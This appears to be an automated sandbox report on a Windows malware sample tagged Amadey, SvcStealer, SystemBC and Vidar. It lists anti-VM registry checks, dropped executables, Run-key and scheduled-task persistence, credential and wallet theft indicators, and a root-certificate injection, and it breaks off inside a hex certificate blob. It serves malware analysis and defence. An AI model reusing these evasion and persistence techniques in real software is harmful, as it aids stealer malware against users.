Malware Analysis Report

2025-04-03 09:22

Sample ID 250305-ehlqhaykt6
Target e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe
SHA256 e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35
Tags
amadey svcstealer systembc vidar 092155 ir7am defense_evasion discovery downloader execution persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35

Threat Level: Known bad

The file e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe was found to be: Known bad.

Malicious Activity Summary

amadey svcstealer systembc vidar 092155 ir7am defense_evasion discovery downloader execution persistence spyware stealer trojan

Detects SvcStealer Payload

Amadey

Svcstealer family

Vidar family

Amadey family

SvcStealer, Diamotrix

Systembc family

Vidar

SystemBC

Detect Vidar Stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of local email clients

Loads dropped DLL

.NET Reactor proctector

Checks computer location settings

Identifies Wine through registry keys

Reads user/profile data of web browsers

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Browser Information Discovery

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-05 03:56

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 03:56

Reported

2025-03-05 03:59

Platform

win7-20240903-en

Max time kernel

150s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects SvcStealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SvcStealer, Diamotrix

stealer downloader svcstealer

Svcstealer family

svcstealer

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\djrq\nbiciq.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\djrq\nbiciq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\djrq\nbiciq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE N/A
N/A N/A C:\ProgramData\djrq\nbiciq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\ProgramData\djrq\nbiciq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\defacfcbcbdbaac = "\"C:\\ProgramData\\defacfcbcbdbaac.exe\"" C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\6eaad46262.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097710101\\6eaad46262.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097720121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
File created C:\Windows\Tasks\futors.job C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\djrq\nbiciq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a